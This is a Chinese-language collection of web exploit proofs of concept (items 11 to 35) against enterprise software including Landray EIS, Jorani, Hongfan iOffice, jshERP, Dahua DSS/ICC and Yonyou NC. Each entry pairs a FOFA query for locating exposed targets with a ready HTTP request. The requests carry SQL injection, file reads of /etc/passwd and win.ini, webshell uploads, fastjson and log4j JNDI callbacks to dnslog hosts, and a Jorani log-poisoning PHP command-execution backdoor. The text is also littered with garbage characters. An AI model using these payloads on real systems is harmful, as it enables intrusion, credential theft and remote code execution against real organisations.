2 ~1 W/ Z7 ?2 A11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入4 b2 J1 h% e+ B+ G4 q
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
; Z; D: p$ p# Q1 L0 H+ BGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.14 s6 S1 _$ s% q' C( ?" A
Host: 127.0.0.14 ]$ |9 d: ^% O; `% x
Pragma: no-cache
# W2 q1 O3 a# ~- M& |Cache-Control: no-cache: P9 v' `" }4 H9 @: C
Upgrade-Insecure-Requests: 1* Z4 g8 _' E: u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.360 ?6 r. ?9 d- Y a6 p: B/ j" j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ G3 A8 m3 k- i- w& @Accept-Encoding: gzip, deflate5 m" }0 f/ b9 n
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8: c2 @0 D$ U) `) o9 k, b Q- J/ m2 [
Connection: close: e) W% c% v2 B8 g% S
! ^+ z7 B7 L( m( b+ C/ C- G" V# l& k3 @8 g* s. _' C' {
12. Jorani < 1.0.2 远程命令执行" w9 c# x l" V, d4 T
FOFA:title="Jorani"8 p r/ ^+ U' ~* K# q! t; \ m
第一步先拿到cookie
/ e7 s, w1 G, q4 Q/ h+ P' UGET /session/login HTTP/1.1& s* j$ R: {9 P" g% p4 W
Host: 192.168.190.30
. {! g: d, {- I8 f V3 P7 J# ]User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
* Y% m4 O$ A" d' xConnection: close" U w& ?7 r. j T
Accept-Encoding: gzip3 E% ~2 \: o- w7 e: o% i5 f
- n! g) {0 ~9 w, ]+ P B
) ~ G f( a* @, [6 _- i' P
响应中csrf_cookie_jorani用于后续请求
4 E* M7 _ J- EHTTP/1.1 200 OK# d- B9 A& |! \, O. ~" I; e
Connection: close
0 X* @ h. `% G- fCache-Control: no-store, no-cache, must-revalidate
. d% l0 K8 h& m3 Z6 i/ jContent-Type: text/html; charset=UTF-8
9 B0 @' w l1 l V+ R4 z. MDate: Tue, 24 Oct 2023 09:34:28 GMT% E: u g, K- q0 B1 v. K
Expires: Thu, 19 Nov 1981 08:52:00 GMT/ P1 y5 D/ r0 t; B
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT: s0 J9 l, q* y: M
Pragma: no-cache* O, v) F8 q$ S1 b( g
Server: Apache/2.4.54 (Debian); m+ s$ V U$ N) I# \
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
: E2 [; p+ P* r8 X9 gSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly) S% H1 T( a5 g4 ?7 G- k4 O
Vary: Accept-Encoding
$ b# [: v! j7 |0 m$ g1 x0 z" C8 r" u, n/ P$ \' v( Q
2 U5 }/ A; _7 ^( B
POST请求,执行函数并进行base64编码
$ g! Y2 b' t, f- [6 {POST /session/login HTTP/1.1
6 p; G. g% J) }4 B# mHost: 192.168.190.30& `8 j) `9 l1 C8 ?1 Y0 U' J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
+ P4 P# M4 {- O# I( BConnection: close% @+ ^/ W9 X) w# X3 D" b, y: G
Content-Length: 252
: E% m1 W6 H7 @Content-Type: application/x-www-form-urlencoded( f) s* |$ A* u2 O0 H: _* U' W! M* u
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; e4 U8 l9 ~; _* i0 l8 v
Accept-Encoding: gzip+ S B. s: \" P. ^. |2 F5 B
/ ?. g( d& a1 J% ^9 Q' ^
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor- k/ K% b" O P/ q" `
( d0 q! I; o3 k% T; E! Q( G# a9 Z1 `2 x- M* J0 | Z1 v
. A8 k( ~( s0 H- b9 U7 S* }向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串% V( A: j2 Z* j6 K( @' ?- Y
GET /pages/view/log-2023-10-24 HTTP/1.1
' k+ |% W+ b) n; G4 dHost: 192.168.190.30' N, E+ c2 ]5 a; g( t% L. ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
$ ~ ]4 r4 V( [& y1 `* ?Connection: close
s- f1 M) \6 o, G @Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
/ Y8 K0 B4 }7 Q( DK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=+ o4 b# c( ?0 ], O3 W' {
X-REQUESTED-WITH: XMLHttpRequest
2 A" B& a' Y# u, N( \2 z/ rAccept-Encoding: gzip
+ g6 I. x& |- B7 @
: [$ s$ M$ {; s1 e7 c1 E% S4 M9 j. W$ I/ n3 g; }9 L: a4 P4 N
13. 红帆iOffice ioFileDown任意文件读取5 L7 O; q( @; S& Q
FOFA:app="红帆-ioffice"
5 j, a s% } s& J7 m9 X) Z7 ~GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.11 T( a1 {9 V& Z! `! ^+ M. z/ f
Host: x.x.x.x" J$ D0 _ u9 L4 S
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
8 H7 d% ]- X. j) ^Connection: close
1 f+ o! a5 X: u8 F2 gAccept: */*
2 q8 e; u [% K# cAccept-Encoding: gzip' U0 m( J3 Z1 M( g
" @( |$ {8 S- H2 O
& p5 j8 P2 n6 j3 I- M
14. 华夏ERP(jshERP)敏感信息泄露
% g% ^3 }+ A/ s, [2 V' dFOFA:body="jshERP-boot"- i9 L/ J8 S! d/ G) |
泄露内容包括用户名密码6 q3 A% \- }8 R1 @
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
7 t5 ]: O6 r% I8 {Host: x.x.x.x
* k2 R" |8 | l4 ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
. F# [3 s- r6 l7 I. A: S) Z7 ]4 s, b hConnection: close
3 ~& a0 W1 S0 E, n; m$ gAccept: */*% m4 d% H, ~& Y
Accept-Language: en
' }2 O2 M' f) f: i! aAccept-Encoding: gzip0 F! N9 s! S2 e3 ^1 e8 h
; Q" W" n. H& g! W# `6 _
3 }4 ^' h; R P/ t& V+ n15. 华夏ERP getAllList信息泄露
3 S- W3 V6 w6 Y) S& C5 x! HCVE-2024-0490; C1 Q, d% d- @
FOFA:body="jshERP-boot"
- \8 }* q6 }: d& t$ Z1 ]泄露内容包括用户名密码
* G! f+ L! O3 e1 w- d& p2 WGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
9 K( M; O8 R. y6 j3 S5 Y1 aHost: 192.168.40.130:100
7 @% o: v& i+ nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36) x8 q+ ]9 Z% _& \9 E; n* r
Connection: close
( d5 F# b& V/ F) I2 qAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
+ d8 N b6 j( s( p6 m- xAccept-Language: en
3 U4 Z; T* |* c* zsec-ch-ua-platform: Windows
1 ]3 l/ M) q( J$ b, l4 C3 H" J* F- bAccept-Encoding: gzip! \( T3 ?/ Y, A6 ^: b$ ]
$ d" u& D# f Q5 W
& ]% m8 K5 B& w& i! D7 u, ?; O16. 红帆HFOffice医微云SQL注入
1 G+ @; r3 h! Z; d; m% dFOFA:title="HFOffice"+ G4 \. n# |# a& w, K
poc中调用函数计算1234的md5值
) O ?3 }" s+ S+ k: C/ I# `8 RGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1$ g' j) _! T, [9 V' [; d4 o/ |
Host: x.x.x.x5 u C- G; U# L4 U2 v
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.366 d7 H4 a7 F* m4 g' r& q
Connection: close z. x5 z0 x3 B! @
Accept: */*
" |% V [ T }" D' e; B" dAccept-Language: en: I& S5 g& P r# x0 G$ X
Accept-Encoding: gzip! c) S- Z: z% T; V9 v( q" _
# s J; l) L. {1 W. N, a4 k8 j1 u. A" J6 @* @ ~! p
17. 大华 DSS itcBulletin SQL 注入6 U/ V. i- w& ~
FOFA:app="dahua-DSS"
" a- ]1 k; ]; B, t0 R: s2 dPOST /portal/services/itcBulletin?wsdl HTTP/1.1; v$ z }3 i9 x& O) @' R
Host: x.x.x.x2 E) m: f, _0 K: N# X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; \- h# N; Q$ J4 w$ \
Connection: close
( v: K! w1 P3 E5 sContent-Length: 345/ F9 ?1 H1 \9 R
Accept-Encoding: gzip
2 A6 X' H# [( ~$ M
( r, A- w2 v) l$ g<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>( I( K1 f7 c; h" \! Z
<s11:Body>0 f% R4 M8 s3 K3 y+ Q2 O
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>9 K* w3 s. y; L, T- ^
<netMarkings># s T) z2 a7 v
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
8 w/ l3 X9 L0 F' f! D8 S, g </netMarkings>
+ o" i" P1 F4 _; c8 p' J) v </ns1:deleteBulletin># K. S- j) @! i
</s11:Body>% D; J1 V/ ]7 b+ |7 Q# J( I
</s11:Envelope>) [3 ^7 w4 r+ r* @/ }) A- }
" P, `, K" H" W6 P2 y7 M
2 X% B0 {. n6 b4 Q4 l |18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
G8 I/ W, B4 WFOFA:app="dahua-DSS"
* I6 _& r) J, u) D* y; v( yGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
( g# X, A( B+ mHost: your-ip( Q) G8 o3 M, F& c! T: ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 s+ {7 a+ r# j. @0 g: gAccept-Encoding: gzip, deflate% i6 H+ a9 S' b# L4 m) m% W3 {
Accept: */*" d* _5 ]( [" ] u( K7 _0 Y/ f
Connection: keep-alive
$ w9 f" T, b3 ] I* F. @' ^; O- C! s7 [ R
9 ], {* Y f0 E( S5 O- c
3 x" D0 I; k% q, y, K6 ^19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
6 B5 u2 c! k/ L3 O: `! ~# x5 EFOFA:app="dahua-DSS"* N# F* X2 k, l @$ B% ]
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.11 o! D; H+ r# q x% ^' D
Host:) G% o c& l# G% M; [0 p* P; e
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36# ? |, q7 Q9 z8 v6 _
Accept-Encoding: gzip, deflate
- l8 w. D7 `1 l: p5 v6 xAccept: */*
- B7 X6 m8 ^: p' u' ~2 N% jConnection: keep-alive
! W/ \" o& @7 M* f2 ?) ]# x# m( ~* p+ J8 q! f7 X
+ f" b& f' g7 w
20. 大华ICC智能物联综合管理平台任意文件读取6 I% D& c3 b7 @5 o
FOFA:body="*客户端会小于800*"
. h6 q% t$ q( r4 K2 iGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1- _# c/ n$ a5 x1 h6 }* j
Host: x.x.x.x g& i, S" }- Z8 U. y2 }
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
- l. o- _0 F) K4 E& IConnection: close
* B5 d9 E, G# i) E dAccept: */*5 }4 N& F" r0 [5 ~% A
Accept-Language: en0 R' T# j1 ~' A% P
Accept-Encoding: gzip7 o" Z9 c7 M) Z1 K5 z+ C
+ z) d8 t3 G9 X8 n8 [3 z' O) g3 s& U8 K1 u. ~) E: F
21. 大华ICC智能物联综合管理平台random远程代码执行
. {- ~# `2 X3 ]+ LFOFA:icon_hash="-1935899595"7 B! I& R: h, L- o/ G( v
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
/ t, G+ c6 P1 U: Y5 e1 |Host: x.x.x.x J4 B6 H) X/ y0 y2 Y+ [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 D: i& A+ X; [! ?& \
Content-Length: 161
- @ `' F7 d5 [3 S( p# X, A$ oAccept-Encoding: gzip
: N# h! T7 |& |- {* f8 A. P- GConnection: close
& _+ g* v/ ?/ I4 jContent-Type: application/json;charset=utf-8! |6 ?* ?/ x' I6 R; a0 x% w
$ f u& _+ ]* C
{3 S7 F5 O( J0 g/ [: X
"a":{% r) N$ F( d! a7 g- ^
"@type":"com.alibaba.fastjson.JSONObject",: @! b; @, C/ `8 n# g7 T; H3 I* f
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
& P2 S3 K0 n! E5 e( J }""
# T5 C& s" A# _( E) f, g8 F}) W* ]7 n/ \1 w/ n
6 V' A9 o* H1 A* g
, `3 w( m) X1 n! H
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
1 P# p, X; t) N) @/ [9 p4 D {7 J: KFOFA:icon_hash="-1935899595"& ]4 p7 |* } g
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1: f2 K+ Z/ L, s$ E- b r
Host: your-ip
) r. |* x# c- ^' ~! P; |* zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36* `! H, { R7 d
Content-Type: application/json;charset=utf-8
- b8 [4 X: l! Q X
$ Z3 }; K& O- A `{
/ L4 }5 ?0 T" k: a3 G+ H"loginName":"${jndi:ldap://dnslog}", @) q* c( M w
}. k3 w9 W" T( e- {: |
) Y4 S, Z2 z- {9 [: Q8 U3 O* x
2 f- i7 _$ ]+ U$ X+ N; I
0 l- ]' H6 I( o+ l' n& d; y# R23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
: H) O! Y2 c1 nFOFA:icon_hash="-1935899595"
! m: t- K2 @* W9 }2 Q; i7 RPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
3 [2 \1 I; y' A- e) d0 AHost: your-ip
3 A% ~4 f) U) k, W2 d( ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 j6 V- O) ^2 B) ?+ n2 [
Content-Type: application/json;charset=utf-8, `# P, e; Q( F& w( K E7 Q# i5 z
Accept-Encoding: gzip1 S: l+ W0 p9 X2 F
Connection: close
, ? B, j" k- Z0 R0 n
" S& W) m# G* B& u8 W- P- Y{" c) n# [$ W$ c# K
"a":{
% G5 [- h& i4 f- }) ] "@type":"com.alibaba.fastjson.JSONObject",( q; Z% ?' F' A% ^/ v4 y
{"@type":"java.net.URL","val":"http://DNSLOG"}% h0 j- ~, S7 h) h3 H- K8 B9 l7 h2 J' J
}""% b! Y0 h5 D$ n
}, V7 `2 _" d% W4 N
. F, n( P6 B$ t( f" k4 v9 v4 x
/ K( p* I& o# v% M5 w; i! f, g% _24. 用友NC 6.5 accept.jsp任意文件上传
9 i# S. h; F Y) f; {9 t7 k9 sFOFA:icon_hash="1085941792"
# |7 U6 ^* a3 W+ hPOST /aim/equipmap/accept.jsp HTTP/1.1
) {% r: w6 G7 ~4 n6 v1 s( tHost: x.x.x.x+ ^5 Y! w7 x, T* C3 ^# ~
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36, j' ]" r# T2 u& ]9 g
Connection: close
- g' O1 U" l( q" y x3 FContent-Length: 449
' p5 u. A0 t* U0 xAccept: */*6 q$ j. E9 s# o: U/ F# k8 j! Z) K
Accept-Encoding: gzip
x( H( v0 }7 D" W* ^0 ~7 VContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
# S; Q% a; f4 j& }: t/ @ B2 M! q& [; c$ m) v
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc M! M6 E2 B# @& | b
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
( r) _+ e( N8 j/ \" [# ~Content-Type: text/plain2 c# v" V" s/ ?
& V; z: q7 w E7 f1 j<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
7 T5 l9 j6 e) z. M-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc& t! ]- D% H$ {' Z1 V% g7 u
Content-Disposition: form-data; name="fname"
8 z( \/ E% ]! m. I% Q6 [
( x' `: B; S; [3 g\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp) l! A! S1 Z/ u( z$ F; k! w
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--. t% i$ a+ E* N. j% J5 B
; R5 _8 \3 F: m" J# D5 r8 J, m+ Q' s; N2 o. ~0 z1 m
25. 用友NC registerServlet JNDI 远程代码执行
& t( G. x5 D0 v0 jFOFA:app="用友-UFIDA-NC"
6 e& y) [6 g; [# C& b' h( r% JPOST /portal/registerServlet HTTP/1.1
* e4 S8 {" U1 R3 _* q# p+ h* q) Y YHost: your-ip$ S" }& ?! m+ i! G9 [' X/ Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
7 H+ [: S k( ^" J2 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
5 k+ @' H% O! X' ZAccept-Encoding: gzip, deflate
6 W( P& l; h5 K- `& e% j jAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
, w# R: v( a% z; n7 w) ?- G- p! M4 `* PContent-Type: application/x-www-form-urlencoded% n# s. w, y0 {, v! p* i
7 y9 u* Z" Q7 H- G* p! @1 h
type=1&dsname=ldap://dnslog/ q8 ^# T. \' @* o
% X" ]- e, R& t7 j
7 P K8 W3 i1 k; B" y) {; B, Y
. `* A3 c% O4 k26. 用友NC linkVoucher SQL注入
" g6 y. j3 _& O. @FOFA:app="用友-UFIDA-NC"
4 S% f# {, D6 QGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.16 T+ m4 h" X1 D% x! ]/ A2 v. i; F
Host: your-ip5 o9 ^2 W2 r& P T% r8 O2 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( \7 |2 s3 i: P. l
Content-Type: application/x-www-form-urlencoded# C% {" Q2 v# m; K% D# u* R) Q
Accept-Encoding: gzip, deflate% u# i' u7 ]$ y
Accept: */*8 P! p3 z) G& \ q# n/ u
Connection: keep-alive
+ Q# H, K( J7 E+ e( k/ a7 w* E
c9 e( ^ z# [6 m5 x% L: ]3 I( |6 G3 B$ n7 H. M
27. 用友 NC showcontent SQL注入
! _. O( t. D# O5 J9 q0 OFOFA:icon_hash="1085941792"2 U8 ]4 Q6 C, e) F' C: `
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
! ^5 Z5 E6 ]% e4 KHost: your-ip
: c, y5 k- A; d% n* [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 P% G/ d, h7 @0 Z. d
Accept-Encoding: identity
6 c- w# p2 z( C& c3 a( T8 @% ~6 _Connection: close6 V; }8 V- z2 l: Y# O+ ~
Content-Type: text/xml; charset=utf-8
/ f2 z/ [: U* z8 r
( E. m4 A- I& k) O1 x; I/ F- e, y9 n
28. 用友NC grouptemplet 任意文件上传2 x, }! X" M, F. U7 q$ F
FOFA:icon_hash="1085941792"
0 R b# a2 M: U/ e+ BPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
; n1 e7 H |4 Q7 R6 f5 R [7 [Host: x.x.x.x6 N# g/ C6 i$ s/ R1 z$ z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.361 t" v: R, ] t
Connection: close) h! K: G$ a1 {2 f! B* e( m
Content-Length: 268/ f$ u4 T: M9 |( m# b1 d
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
1 X. F2 ?6 d' ]7 Q$ E# J7 _Accept-Encoding: gzip* X0 p2 _$ P- c# z) ~
7 r* w) v1 G/ W* j
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
3 R+ Y/ ^* f/ X& w' MContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"" e" @; a* O2 L- J
Content-Type: application/octet-stream& m2 i- O+ M1 _1 |) r2 w& A2 a
* F T$ u% d* L6 a4 a, i! V<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>( q, W- Q- s$ m/ Y3 b
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--2 E! v7 J. ^2 m- F
9 z8 C5 |$ M9 }+ D* S
4 P h+ N' ^; Q3 ]/ e: }/uapim/static/pages/nc/head.jsp
( o6 b! O; t3 j L" \- ^, m3 l! ~! }# [
29. 用友NC down/bill SQL注入( \7 b% r9 c/ L) \ J- r
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"& v: h! c' E# O d
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
# D2 ^( d7 c0 f# Q) @1 p2 DHost: your-ip' K/ u5 W4 P+ t9 r0 _8 \9 D3 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ u" f: H9 ]$ E6 z! E4 `2 Y' B; K% M
Content-Type: application/x-www-form-urlencoded* E' S' F) y8 Y% C/ N
Accept-Encoding: gzip, deflate0 Z4 `; h7 x/ B) f8 l
Accept: */*
2 a" M3 h- R9 p: F& f) gConnection: keep-alive
' f" X( o& ? n" Y+ [2 I
, A, A3 q1 s% j, j( o: y2 o& L* z" R% t7 D
30. 用友NC importPml SQL注入/ J( I P, W9 G2 O2 C' P
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"$ m0 m( @1 ]4 h! v- f6 f
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1% R- h* Q: C0 [: _3 _! m8 m* D
Host: your-ip
4 \/ Q' m7 T% d7 c1 GContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
1 V$ `3 S% Z+ v% ]" |" PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.365 }+ f4 `! N# L& v! S+ G- L
Connection: close$ q! f0 l$ z8 D: ~7 d7 `# e' B
; y0 w6 P. F1 e, {------WebKitFormBoundaryH970hbttBhoCyj9V% q& K$ i; y5 S6 k* f
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"" b( e g n6 U: ?6 R7 k' R
Content-Type: image/jpeg
; n' h$ V* b- w0 h------WebKitFormBoundaryH970hbttBhoCyj9V--2 s6 n+ s# o6 f
/ h/ K5 m+ c& `% N5 @7 I+ M
9 N! T4 [2 \. j: K' X0 o- q. e+ i31. 用友NC runStateServlet SQL注入
& Y* X0 g: d; v) _ |version<=6.5 H! i3 }! \' q; q
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif") O) @, [ D5 U# n) I
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
% ? ~% _9 @" v* ?% ?! u) |Host: host- u4 G6 ^8 q4 J0 _% f; c# i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36# z+ `5 f0 N( W! @, ~
Content-Type: application/x-www-form-urlencoded4 j5 \+ J% }4 K( h$ l
$ z6 W8 U3 m( ^; R
4 a: ?( M7 a$ W- u
32. 用友NC complainbilldetail SQL注入. l6 h0 I5 c+ Z* H( W/ ^1 H9 A3 L
version= NC633、NC65
! { ?/ a: ~! M5 q. Z1 P5 A- LFOFA:app="用友-UFIDA-NC"* u4 y: h" K- V& o- T7 T# e
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
7 W6 V( v' v( Z9 U; mHost: your-ip3 C: t9 E5 o2 f, N+ t% B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 L; F) [8 T8 G O0 [
Content-Type: application/x-www-form-urlencoded
4 o8 Y+ q- b% }' f. s. n3 C$ ?Accept-Encoding: gzip, deflate
0 q2 q4 Y J8 O9 L: w+ N, gAccept: */** s* ~/ T# e; k3 q9 W/ z |" m+ X0 r
Connection: keep-alive3 V' P- S; k3 a1 I. }, h( H; A
# T* \# d* @7 |6 R9 ?8 H6 k; K3 D9 j" b3 D6 _- ^: @& A" ]
33. 用友NC downTax/download SQL注入
5 M6 k$ b- X- ~4 I4 z* l% Qversion:NC6.5FOFA:app="用友-UFIDA-NC"
. Z7 t* d8 b$ m5 m: V- LGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
' G! T: `8 G) `- }- cHost: your-ip4 n3 ~7 l& |. L& W* v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, t! b" N% d! _! o& D+ _
Content-Type: application/x-www-form-urlencoded9 Q% |9 a+ J) q- e/ Q, _
Accept-Encoding: gzip, deflate: R- s* I8 o* r1 }
Accept: */*
& z$ p$ @+ i" MConnection: keep-alive
2 R' O. C1 W, h' m) \4 }2 W$ I% K7 Q, U! k
1 m: }' b# M2 Z/ J5 A' |
34. 用友NC warningDetailInfo接口SQL注入: h y3 e2 l/ w, @
FOFA:app="用友-UFIDA-NC"' Q+ r; w& H y, O n6 o. D
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
2 ]; W& \% y; q1 _4 F* v5 v+ OHost: your-ip% u4 C- l% g$ `$ T7 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; T$ t9 f7 L4 }* vContent-Type: application/x-www-form-urlencoded
6 X* U* ^) I, j8 R) a; nAccept-Encoding: gzip, deflate
2 l( Y5 z7 E" e& I6 s) jAccept: */*7 m9 W# M1 U K3 ~% S# _) v* d' ?
Connection: keep-alive: V! g, e2 }9 u# Z) @( l: Y5 S1 d
7 Q5 {# i- n( T9 r" a4 _
' o! O% Z6 `' p35. 用友NC-Cloud importhttpscer任意文件上传
$ N3 |3 n. Y6 h+ i0 `FOFA:app="用友-NC-Cloud"% q+ X% t5 Z, b2 U8 G
